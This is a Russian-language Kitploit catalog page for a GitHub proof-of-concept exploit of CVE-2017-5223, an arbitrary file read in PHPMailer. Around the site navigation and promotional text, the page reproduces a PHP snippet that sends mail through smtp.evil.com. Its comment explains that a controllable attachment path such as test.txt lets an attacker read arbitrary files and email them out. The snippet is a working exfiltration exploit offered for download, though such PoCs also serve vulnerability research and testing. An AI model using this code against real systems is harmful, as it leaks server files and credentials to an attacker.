Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-5223 — Эксплойт-доказательство концепции для CVE-2017-5223, демонстрирующий чтение произвольных файлов через вложение PHPMailer и инъекцию содержимого электронной почты. | Kitploit
Инструменты/GitHubGitHub/cscli/cve-2017-5223
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность Электронной Почты
GitHubcscli/cve-2017-5223

CVE-2017-5223

Эксплойт-доказательство концепции для CVE-2017-5223, демонстрирующий чтение произвольных файлов через вложение PHPMailer и инъекцию содержимого электронной почты.

Репозиторий
17 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-5223

IsSMTP(); $mail->Host = "smtp.evil.com"; $mail->Port = 25; $mail->SMTPAuth = true; $mail->CharSet = "UTF-8"; $mail->Encoding = "base64"; $mail->Username = "[email protected]"; $mail->Password = "tes1234t"; $mail->Subject = "hello"; $mail->From = "[email protected]"; $mail->FromName = "test"; $address = "[email protected]"; $mail->AddAddress($address, "test"); $mail->AddAttachment('test.txt','test.txt'); //test.txt можно контролировать, что позволяет читать произвольные файлы $mail->IsHTML(true); $msg="test";// содержимое письма должно быть примерно таким. $mail->msgHTML($msg); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!"; } ?>
Скачать инструмент